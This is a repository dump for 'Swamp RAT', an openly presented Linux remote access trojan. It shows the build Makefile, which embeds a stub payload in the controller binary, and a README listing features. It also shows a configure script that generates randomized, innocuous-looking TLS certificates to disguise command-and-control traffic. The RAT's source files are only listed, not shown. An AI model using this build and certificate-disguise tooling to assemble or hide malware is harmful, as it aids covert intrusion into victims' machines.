├── .gitignore ├── LICENSE ├── Makefile ├── README.md ├── configure.sh ├── docs ├── img │ ├── agenda.jpg │ ├── alibaba_article_0.PNG │ ├── alibaba_article_1.PNG │ ├── alibaba_cnc.PNG │ ├── alibaba_die_entropy.PNG │ ├── alibaba_die_main.PNG │ ├── alibaba_http.PNG │ ├── alibaba_http_highlight.PNG │ ├── but_why.png │ ├── bypass_firewall.jpg │ ├── darkcomet_rat.gif │ ├── darkcomet_rat.jpg │ ├── debugger.jpg │ ├── demo_baby.jpeg │ ├── demo_meme.jpeg │ ├── demo_serious.jpg │ ├── doing_it_right.jpg │ ├── escalated_quickly.jpg │ ├── escalated_quickly_rat.png │ ├── everything_hurts.png │ ├── fancy_bear.jpg │ ├── fancy_bear_analysis_0.PNG │ ├── fancy_bear_analysis_1.PNG │ ├── fancy_bear_analysis_2.PNG │ ├── fancy_bear_analysis_3.PNG │ ├── fancy_bear_analysis_4.PNG │ ├── fancy_bear_analysis_5.PNG │ ├── fancy_bear_analysis_6.PNG │ ├── fancy_bear_analysis_7.PNG │ ├── fancy_bear_analysis_8.PNG │ ├── fancy_bear_analysis_9.PNG │ ├── fancy_bear_die.PNG │ ├── fancy_bear_portex_analyzer.PNG │ ├── hackers_meme.png │ ├── history.png │ ├── lab_rat.jpg │ ├── malware_the_rock_meme.jpg │ ├── ncurses.png │ ├── njrat.jpg │ ├── njrat_article.png │ ├── njrat_cnc.png │ ├── njrat_strings.png │ ├── now_what_do_i_do.jpeg │ ├── powder_blues.jpg │ ├── power_pool_meme.png │ ├── powerpool_anti_debug.PNG │ ├── powerpool_article.PNG │ ├── powerpool_main_thread.PNG │ ├── question_mark.png │ ├── questions.jpg │ ├── rat_animal.jpg │ ├── rat_tool.png │ ├── really_guy_all_you_got.jpg │ ├── server_room_fire.jpg │ ├── show_me_a_demo.jpg │ ├── swamp-rat.png │ ├── tcp_xor_dataframe.png │ ├── team_work.jpg │ ├── thank_you.jpg │ ├── thats_all_you_got.jpeg │ ├── user_support.jpeg │ ├── user_support.jpg │ ├── what_are_you_doing.jpg │ ├── whats_wrong_here.jpg │ ├── wikileaks.jpg │ ├── wild_rat.jpg │ ├── xor_gate.gif │ ├── xor_gate.jpg │ └── xor_truth_table.jpg ├── swamp-rat.pdf └── swamp-rat.tex ├── img └── swamp-rat.gif └── src ├── include ├── common.h ├── crypt.h ├── defs.h ├── main │ ├── config.h │ ├── crypt.h │ ├── ncurses.h │ └── net.h ├── net.h └── stub │ ├── cam.h │ ├── keys.h │ ├── net.h │ ├── re.h │ ├── shell.h │ └── sys.h ├── main.c └── stub.c /.gitignore: -------------------------------------------------------------------------------- 1 | bin/* 2 | ssl/* 3 | swamp-rat 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Swamp RAT - A Linux RAT in C 2 | Copyright (C) 2018 Lilly Chalupowski 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | (at your option) any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # Copyright (C) 2018 Lilly Chalupowski # 3 | # # 4 | # This program is free software: you can redistribute it and/or modify # 5 | # it under the terms of the GNU General Public License as published by # 6 | # the Free Software Foundation, either version 3 of the License, or # 7 | # (at your option) any later version. # 8 | # # 9 | # This program is distributed in the hope that it will be useful, # 10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of # 11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # 12 | # GNU General Public License for more details. # 13 | # # 14 | # You should have received a copy of the GNU General Public License # 15 | # along with this program. If not, see . # 16 | ########################################################################## 17 | 18 | .PHONY: docs 19 | .PHONY: build 20 | .PHONY: all 21 | 22 | all: build docs 23 | 24 | build: 25 | mkdir -p bin/ 26 | gcc -Wall -Werror -g -v src/main.c -o bin/swamp-rat -pthread -lcurl -lncurses -lform -lmenu -luuid 27 | gcc -v src/stub.c -o bin/stub -pthread -lcurl -luuid 28 | objcopy bin/swamp-rat --add-section rodata=bin/stub 29 | cp bin/swamp-rat swamp-rat 30 | 31 | docs: 32 | cd docs/ && \ 33 | pdflatex -shell-escape swamp-rat.tex && \ 34 | pdflatex -shell-escape swamp-rat.tex && \ 35 | rm -f *.log && \ 36 | rm -f *.aux && \ 37 | rm -f *.toc && \ 38 | rm -f *.out && \ 39 | rm -f *.nav && \ 40 | rm -f *.snm && \ 41 | rm -f *.vrb && \ 42 | rm -rf _minted-swamp-rat/ 43 | 44 | clean: 45 | rm -f swamp-rat 46 | rm -rf bin/ 47 | rm -rf ssl/ 48 | 49 | install: 50 | cp bin/swamp-rat /usr/bin/swamp-rat 51 | 52 | uninstall: 53 | rm -f /usr/bin/swamp-rat 54 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://github.com/lillypad/swamp-rat/blob/master/LICENSE) 2 | 3 | # Swamp RAT 4 | 5 |

6 | 7 | Swamp RAT 8 | 9 |

10 | 11 | 12 | A `linux` RAT that lurks where others do not. 13 | 14 | # Purpose 15 | 16 | I started this as most free `linux` RATs are done half hazardly in higher level languages. 17 | 18 | # Screenshots 19 | 20 |

21 | Swamp RAT 22 |

23 | 24 | # Dependancies 25 | - [`libcurl`](https://curl.haxx.se/libcurl/) 26 | - [`libcurses`](http://tldp.org/HOWTO/NCURSES-Programming-HOWTO/) 27 | 28 | # Building Swamp RAT 29 | ```bash 30 | ./configure.sh 31 | make 32 | ``` 33 | 34 | # Notable Features 35 | - `xor` encrypted packets over `tcp` 36 | - `ncurses` terminal `ui` 37 | 38 | # TODO 39 | - SSL Communications 40 | - Webcam Snapshot 41 | - Finish `ncurses` interface 42 | -------------------------------------------------------------------------------- /configure.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | ################################## 4 | # swamp-rat configuration script # 5 | ################################## 6 | 7 | function get_country(){ 8 | COUNTRIES[0]="AF" 9 | COUNTRIES[1]="AL" 10 | COUNTRIES[2]="DZ" 11 | COUNTRIES[3]="AS" 12 | COUNTRIES[4]="AD" 13 | COUNTRIES[5]="AO" 14 | COUNTRIES[6]="AI" 15 | COUNTRIES[7]="AQ" 16 | COUNTRIES[8]="AG" 17 | COUNTRIES[9]="AR" 18 | COUNTRIES[10]="AM" 19 | COUNTRIES[11]="AW" 20 | COUNTRIES[12]="AU" 21 | COUNTRIES[13]="AT" 22 | COUNTRIES[14]="AZ" 23 | COUNTRIES[15]="BS" 24 | COUNTRIES[16]="BH" 25 | COUNTRIES[17]="BD" 26 | COUNTRIES[18]="BB" 27 | COUNTRIES[19]="BY" 28 | COUNTRIES[20]="BE" 29 | COUNTRIES[21]="BZ" 30 | COUNTRIES[22]="BJ" 31 | COUNTRIES[23]="BM" 32 | COUNTRIES[24]="BT" 33 | COUNTRIES[25]="BO" 34 | COUNTRIES[26]="BA" 35 | COUNTRIES[27]="BW" 36 | COUNTRIES[28]="BV" 37 | COUNTRIES[27]="BR" 38 | COUNTRIES[30]="IO" 39 | COUNTRIES[31]="BN" 40 | COUNTRIES[32]="BG" 41 | COUNTRIES[33]="BF" 42 | COUNTRIES[34]="BI" 43 | COUNTRIES[35]="KH" 44 | COUNTRIES[36]="CM" 45 | COUNTRIES[37]="CA" 46 | COUNTRIES[38]="CV" 47 | COUNTRIES[39]="KY" 48 | COUNTRIES[40]="CF" 49 | COUNTRIES[41]="TD" 50 | COUNTRIES[42]="CL" 51 | COUNTRIES[43]="CN" 52 | COUNTRIES[44]="CX" 53 | COUNTRIES[45]="CC" 54 | COUNTRIES[46]="CO" 55 | COUNTRIES[47]="KM" 56 | COUNTRIES[48]="CG" 57 | COUNTRIES[49]="CD" 58 | COUNTRIES[50]="CK" 59 | COUNTRIES[51]="CR" 60 | COUNTRIES[52]="CI" 61 | COUNTRIES[53]="HR" 62 | COUNTRIES[54]="CU" 63 | COUNTRIES[55]="CY" 64 | COUNTRIES[56]="CZ" 65 | COUNTRIES[57]="DK" 66 | COUNTRIES[58]="DJ" 67 | COUNTRIES[59]="DM" 68 | COUNTRIES[60]="DO" 69 | COUNTRIES[61]="EC" 70 | COUNTRIES[62]="EG" 71 | COUNTRIES[63]="SV" 72 | COUNTRIES[64]="GQ" 73 | COUNTRIES[65]="ER" 74 | COUNTRIES[66]="EE" 75 | COUNTRIES[67]="ET" 76 | COUNTRIES[68]="FK" 77 | COUNTRIES[69]="FO" 78 | COUNTRIES[70]="FJ" 79 | COUNTRIES[71]="FI" 80 | COUNTRIES[72]="FR" 81 | COUNTRIES[73]="GF" 82 | COUNTRIES[74]="PF" 83 | COUNTRIES[75]="TF" 84 | COUNTRIES[76]="GA" 85 | COUNTRIES[77]="GM" 86 | COUNTRIES[78]="GE" 87 | COUNTRIES[79]="DE" 88 | COUNTRIES[80]="GH" 89 | COUNTRIES[81]="GI" 90 | COUNTRIES[82]="GR" 91 | COUNTRIES[83]="GL" 92 | COUNTRIES[84]="GD" 93 | COUNTRIES[85]="GP" 94 | COUNTRIES[86]="GU" 95 | COUNTRIES[87]="GT" 96 | COUNTRIES[88]="GN" 97 | COUNTRIES[89]="GW" 98 | COUNTRIES[90]="GY" 99 | COUNTRIES[91]="HT" 100 | COUNTRIES[92]="HM" 101 | COUNTRIES[93]="HN" 102 | COUNTRIES[94]="HK" 103 | COUNTRIES[95]="HU" 104 | COUNTRIES[96]="IS" 105 | COUNTRIES[97]="IN" 106 | COUNTRIES[98]="ID" 107 | COUNTRIES[99]="IR" 108 | COUNTRIES[100]="IQ" 109 | COUNTRIES[101]="IE" 110 | COUNTRIES[102]="IL" 111 | COUNTRIES[103]="IT" 112 | COUNTRIES[104]="JM" 113 | COUNTRIES[105]="JP" 114 | COUNTRIES[106]="JO" 115 | COUNTRIES[107]="KZ" 116 | COUNTRIES[108]="KE" 117 | COUNTRIES[109]="KI" 118 | COUNTRIES[110]="KP" 119 | COUNTRIES[111]="KR" 120 | COUNTRIES[112]="KW" 121 | COUNTRIES[113]="KG" 122 | COUNTRIES[114]="LA" 123 | COUNTRIES[115]="LV" 124 | COUNTRIES[116]="LB" 125 | COUNTRIES[117]="LS" 126 | COUNTRIES[118]="LR" 127 | COUNTRIES[119]="LY" 128 | COUNTRIES[120]="LI" 129 | COUNTRIES[121]="LT" 130 | COUNTRIES[122]="LU" 131 | COUNTRIES[123]="MO" 132 | COUNTRIES[124]="MK" 133 | COUNTRIES[125]="MG" 134 | COUNTRIES[126]="MW" 135 | COUNTRIES[127]="MY" 136 | COUNTRIES[128]="MV" 137 | COUNTRIES[129]="ML" 138 | COUNTRIES[130]="MT" 139 | COUNTRIES[131]="MH" 140 | COUNTRIES[132]="MQ" 141 | COUNTRIES[133]="MR" 142 | COUNTRIES[134]="MU" 143 | COUNTRIES[135]="YT" 144 | COUNTRIES[136]="MX" 145 | COUNTRIES[137]="FM" 146 | COUNTRIES[138]="MD" 147 | COUNTRIES[139]="MC" 148 | COUNTRIES[140]="MN" 149 | COUNTRIES[141]="MS" 150 | COUNTRIES[142]="MA" 151 | COUNTRIES[143]="MZ" 152 | COUNTRIES[144]="MM" 153 | COUNTRIES[145]="NA" 154 | COUNTRIES[146]="NR" 155 | COUNTRIES[147]="NP" 156 | COUNTRIES[148]="NL" 157 | COUNTRIES[149]="AN" 158 | COUNTRIES[150]="NC" 159 | COUNTRIES[151]="NZ" 160 | COUNTRIES[152]="NI" 161 | COUNTRIES[153]="NE" 162 | COUNTRIES[154]="NG" 163 | COUNTRIES[155]="NU" 164 | COUNTRIES[156]="NF" 165 | COUNTRIES[157]="MP" 166 | COUNTRIES[158]="NO" 167 | COUNTRIES[159]="OM" 168 | COUNTRIES[160]="PK" 169 | COUNTRIES[161]="PW" 170 | COUNTRIES[162]="PS" 171 | COUNTRIES[163]="PA" 172 | COUNTRIES[164]="PG" 173 | COUNTRIES[165]="PY" 174 | COUNTRIES[166]="PE" 175 | COUNTRIES[167]="PH" 176 | COUNTRIES[168]="PN" 177 | COUNTRIES[169]="PL" 178 | COUNTRIES[170]="PT" 179 | COUNTRIES[171]="PR" 180 | COUNTRIES[172]="QA" 181 | COUNTRIES[173]="RE" 182 | COUNTRIES[174]="RO" 183 | COUNTRIES[175]="RU" 184 | COUNTRIES[176]="RW" 185 | COUNTRIES[177]="SH" 186 | COUNTRIES[178]="KN" 187 | COUNTRIES[179]="LC" 188 | COUNTRIES[180]="PM" 189 | COUNTRIES[181]="VC" 190 | COUNTRIES[182]="WS" 191 | COUNTRIES[183]="SM" 192 | COUNTRIES[184]="ST" 193 | COUNTRIES[185]="SA" 194 | COUNTRIES[186]="SN" 195 | COUNTRIES[187]="CS" 196 | COUNTRIES[188]="SC" 197 | COUNTRIES[189]="SL" 198 | COUNTRIES[190]="SG" 199 | COUNTRIES[191]="SK" 200 | COUNTRIES[192]="SI" 201 | COUNTRIES[193]="SB" 202 | COUNTRIES[194]="SO" 203 | COUNTRIES[195]="ZA" 204 | COUNTRIES[196]="GS" 205 | COUNTRIES[197]="ES" 206 | COUNTRIES[198]="LK" 207 | COUNTRIES[199]="SD" 208 | COUNTRIES[200]="SR" 209 | COUNTRIES[201]="SJ" 210 | COUNTRIES[202]="SZ" 211 | COUNTRIES[203]="SE" 212 | COUNTRIES[204]="CH" 213 | COUNTRIES[205]="SY" 214 | COUNTRIES[206]="TW" 215 | COUNTRIES[207]="TJ" 216 | COUNTRIES[208]="TZ" 217 | COUNTRIES[209]="TH" 218 | COUNTRIES[210]="TL" 219 | COUNTRIES[211]="TG" 220 | COUNTRIES[212]="TK" 221 | COUNTRIES[213]="TO" 222 | COUNTRIES[214]="TT" 223 | COUNTRIES[215]="TN" 224 | COUNTRIES[216]="TR" 225 | COUNTRIES[217]="TM" 226 | COUNTRIES[218]="TC" 227 | COUNTRIES[219]="TV" 228 | COUNTRIES[220]="UG" 229 | COUNTRIES[221]="UA" 230 | COUNTRIES[222]="AE" 231 | COUNTRIES[223]="GB" 232 | COUNTRIES[224]="US" 233 | COUNTRIES[225]="UM" 234 | COUNTRIES[226]="UY" 235 | COUNTRIES[227]="UZ" 236 | COUNTRIES[228]="VU" 237 | COUNTRIES[229]="VN" 238 | COUNTRIES[230]="VG" 239 | COUNTRIES[231]="VI" 240 | COUNTRIES[232]="WF" 241 | COUNTRIES[233]="EH" 242 | COUNTRIES[234]="YE" 243 | COUNTRIES[235]="ZW" 244 | 245 | COUNTRIES_SIZE=${#COUNTRIES[@]} 246 | 247 | COUNTRIES_INDEX=$(($RANDOM % $COUNTRIES_SIZE)) 248 | 249 | COUNTRY=${COUNTRIES[$COUNTRIES_INDEX]} 250 | echo $COUNTRY 251 | } 252 | 253 | function random_domain(){ 254 | # :TODO: generate random website 255 | TLDS[0]="com" 256 | TLDS[1]="net" 257 | TLDS[2]="club" 258 | TLDS[3]="biz" 259 | TLDS[4]="org" 260 | TLDS[5]="download" 261 | TLDS[6]="co.uk" 262 | TLDS[7]="ca" 263 | TLDS[8]="co" 264 | TLDS[9]="jp" 265 | TLDS_SIZE=${#TLDS[@]} 266 | TLDS_INDEX=$(($RANDOM % $TLDS_SIZE)) 267 | TLD=${TLDS[$TLDS_INDEX]} 268 | WORDS=/usr/share/dict/words 269 | TOTAL_WORDS=$(cat $WORDS | wc -l) 270 | WORDS_INDEX=$(($RANDOM % $TOTAL_WORDS)) 271 | DOMAIN=$(sed `echo $WORDS_INDEX`"q;d" $WORDS) 272 | WORDS_INDEX=$(($RANDOM % $TOTAL_WORDS)) 273 | SUBDOMAIN=$(sed `echo $WORDS_INDEX`"q;d" $WORDS) 274 | echo "${SUBDOMAIN}.${DOMAIN}.${TLD}" | tr '[:upper:]' '[:lower:]' 275 | } 276 | 277 | function random_word(){ 278 | WORDS=/usr/share/dict/words 279 | TOTAL_WORDS=$(cat $WORDS | wc -l) 280 | WORDS_INDEX=$(($RANDOM % $TOTAL_WORDS)) 281 | WORD=$(sed `echo $WORDS_INDEX`"q;d" $WORDS) 282 | echo "${WORD}" 283 | } 284 | 285 | function ssl(){ 286 | # :TODO: generate random ssl certificate 287 | mkdir -p ssl/ 288 | COUNTRY=$(get_country) 289 | DOMAIN=$(random_domain) 290 | ORGANIZATION=$(random_word) 291 | CITY=$(random_word) 292 | STATE=$(random_word) 293 | echo "generating random ssl certificate" 294 | echo "C=${COUNTRY}" 295 | echo "ST=${STATE}" 296 | echo "L=${CITY}" 297 | echo "O=${ORGANIZATION}" 298 | echo "CN=${DOMAIN}" 299 | openssl req \ 300 | -x509 \ 301 | -nodes \ 302 | -days 365 \ 303 | -newkey rsa:4096 \ 304 | -subj "/C=${COUNTRY}/ST=${STATE}/L=${CITY}/O=${ORGANIZATION}/CN=${DOMAIN}" \ 305 | -keyout ssl/swamp-rat.key \ 306 | -out ssl/swamp-rat.crt 307 | } 308 | 309 | ssl 310 | -------------------------------------------------------------------------------- /docs/img/agenda.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/agenda.jpg -------------------------------------------------------------------------------- /docs/img/alibaba_article_0.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_article_0.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_article_1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_article_1.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_cnc.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_cnc.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_die_entropy.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_die_entropy.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_die_main.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_die_main.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_http.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_http.PNG -------------------------------------------------------------------------------- /docs/img/alibaba_http_highlight.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/alibaba_http_highlight.PNG -------------------------------------------------------------------------------- /docs/img/but_why.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/but_why.png -------------------------------------------------------------------------------- /docs/img/bypass_firewall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/bypass_firewall.jpg -------------------------------------------------------------------------------- /docs/img/darkcomet_rat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/darkcomet_rat.gif -------------------------------------------------------------------------------- /docs/img/darkcomet_rat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/darkcomet_rat.jpg -------------------------------------------------------------------------------- /docs/img/debugger.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/debugger.jpg -------------------------------------------------------------------------------- /docs/img/demo_baby.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/demo_baby.jpeg -------------------------------------------------------------------------------- /docs/img/demo_meme.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/demo_meme.jpeg -------------------------------------------------------------------------------- /docs/img/demo_serious.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/demo_serious.jpg -------------------------------------------------------------------------------- /docs/img/doing_it_right.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/doing_it_right.jpg -------------------------------------------------------------------------------- /docs/img/escalated_quickly.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/escalated_quickly.jpg -------------------------------------------------------------------------------- /docs/img/escalated_quickly_rat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/escalated_quickly_rat.png -------------------------------------------------------------------------------- /docs/img/everything_hurts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/everything_hurts.png -------------------------------------------------------------------------------- /docs/img/fancy_bear.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear.jpg -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_0.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_0.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_1.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_1.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_2.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_2.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_3.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_3.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_4.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_4.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_5.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_5.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_6.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_6.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_7.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_7.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_8.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_8.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_analysis_9.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_analysis_9.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_die.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_die.PNG -------------------------------------------------------------------------------- /docs/img/fancy_bear_portex_analyzer.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/fancy_bear_portex_analyzer.PNG -------------------------------------------------------------------------------- /docs/img/hackers_meme.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/hackers_meme.png -------------------------------------------------------------------------------- /docs/img/history.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/history.png -------------------------------------------------------------------------------- /docs/img/lab_rat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/lab_rat.jpg -------------------------------------------------------------------------------- /docs/img/malware_the_rock_meme.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/malware_the_rock_meme.jpg -------------------------------------------------------------------------------- /docs/img/ncurses.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/ncurses.png -------------------------------------------------------------------------------- /docs/img/njrat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/njrat.jpg -------------------------------------------------------------------------------- /docs/img/njrat_article.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/njrat_article.png -------------------------------------------------------------------------------- /docs/img/njrat_cnc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/njrat_cnc.png -------------------------------------------------------------------------------- /docs/img/njrat_strings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/njrat_strings.png -------------------------------------------------------------------------------- /docs/img/now_what_do_i_do.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/now_what_do_i_do.jpeg -------------------------------------------------------------------------------- /docs/img/powder_blues.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/powder_blues.jpg -------------------------------------------------------------------------------- /docs/img/power_pool_meme.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/power_pool_meme.png -------------------------------------------------------------------------------- /docs/img/powerpool_anti_debug.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/powerpool_anti_debug.PNG -------------------------------------------------------------------------------- /docs/img/powerpool_article.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/powerpool_article.PNG -------------------------------------------------------------------------------- /docs/img/powerpool_main_thread.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/powerpool_main_thread.PNG -------------------------------------------------------------------------------- /docs/img/question_mark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/question_mark.png -------------------------------------------------------------------------------- /docs/img/questions.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/questions.jpg -------------------------------------------------------------------------------- /docs/img/rat_animal.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/rat_animal.jpg -------------------------------------------------------------------------------- /docs/img/rat_tool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/rat_tool.png -------------------------------------------------------------------------------- /docs/img/really_guy_all_you_got.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/really_guy_all_you_got.jpg -------------------------------------------------------------------------------- /docs/img/server_room_fire.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/server_room_fire.jpg -------------------------------------------------------------------------------- /docs/img/show_me_a_demo.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/docs/img/show_me_a_demo.jpg 